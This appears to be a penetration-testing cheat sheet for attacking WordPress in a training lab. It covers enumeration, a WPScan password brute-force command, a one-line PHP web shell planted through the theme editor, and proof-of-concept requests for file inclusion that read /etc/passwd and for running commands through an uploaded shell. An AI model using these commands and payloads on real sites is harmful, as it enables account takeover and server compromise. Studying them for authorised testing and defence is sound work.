WordPress
Introduction
WordPress is extremely prevalent on the internet and presents a vast attack surface
Getting access to an administrator is usually sufficient to obtain code execution on the server.
Editors and authors might have access to certain vulnerable plugins, which normal users donβt.
Wordpress User Roles
Administrator
Full Privileges - This user role is an interesting target due to his capability of managing plugins
Editor
Can publish and manage any user's posts - This user role is an interesting target due to his capability of managing plugins
Author
Can publish and manage their posts
Contributor
Can write and manage their own post, but he cannot publish them
Subscriber
Can view posts and manage/modify their profile
WordPress Discovery/Footprinting
Browse to http://blog.inlanefreight.local/robots.txt
Check if robots.txt contains any wp-entry (e.g. wp-admin, wp-content, wp-sitemap)
Browse to http://blog.inlanefreight.local/wp-admin
Check if wp-admin exists
Browse to http://blog.inlanefreight.local/wp-content
Check if wp-content exists
Browse to http://blog.inlanefreight.local/wp-content/plugins
Enumerate and look for vulnerable plugins
Browse to http://blog.inlanefreight.local/wp-content/themes
Enumerate and look for vulnerable themes
curl -s http://blog.inlanefreight.local | grep WordPress
Check webpage source
curl -s http://blog.inlanefreight.local | grep themes
Check webpage source
curl -s http://blog.inlanefreight.local | grep plugins
Check webpage source
WpScan Basic Commands
wpscan --url test.example --api-token TOKENVALUE --output wpscan-ir-host
Run wpscan using an api token
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://domainnameoripaddress>
Run wpscan and perform a password attack against the target
Wordpress User Enumeration and Login Bruteforcing
Login Form - Usernames Enumeration: in some versions of wordpress it's possible to enumerate usernames due to wordpress error messages giving too many information: whenever a username is right, the web application may show a message such as
"the password is not valid", meaning that the username is valid.Login Form - Password Bruteforcing: wpscan can be used to bruteforce a valid user's password:
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
Admin User - Remote Code Execution
An aministrator account may edit PHP code in order to gain RCE
The steps are the following:
Semi-automatically, using
msfconsole:use exploit/unix/webapp/wp_admin_shell_uploadManually, by modifying a theme:
Login as administrator β Navigate to: appearance β side panel β theme editor β select a theme
Add the following to the theme:
system($_GET[0]);Use the following URL to gain RCE:
http://example.test/wp-content/themes/THEMENAME/FILEPHPNAME.PHP?0=id
WordPress Known Vulnerable Plugins
Mail-Mastaallows LFI by using the following PoC:curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwdwpDiscuzallows RCE by using the following PoC:if it fails, use
cURLto execute commands using the uploaded web shell:curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id
Last updated
Was this helpful?